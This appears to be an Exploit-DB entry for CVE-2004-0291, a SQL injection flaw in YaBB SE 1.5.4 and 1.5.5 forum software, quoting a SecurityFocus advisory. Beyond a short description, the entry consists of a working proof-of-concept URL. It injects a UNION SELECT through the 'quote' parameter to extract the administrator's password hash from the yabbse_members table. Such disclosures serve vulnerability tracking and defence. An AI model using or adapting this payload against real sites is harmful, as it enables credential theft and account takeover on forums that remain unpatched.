YABB SE 1.5 Quote Parameter SQL Injection Vulnerability

2004-02-16T00:00:00
ID EDB-ID:23710
Type exploitdb
Reporter BaCkSpAcE
Modified 2004-02-16T00:00:00

Description

YABB SE 1.5 Quote Parameter SQL Injection Vulnerability. CVE-2004-0291. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/9674/info

It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software. 

YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue, however, other versions could be affected as well.

http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,nul
l,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*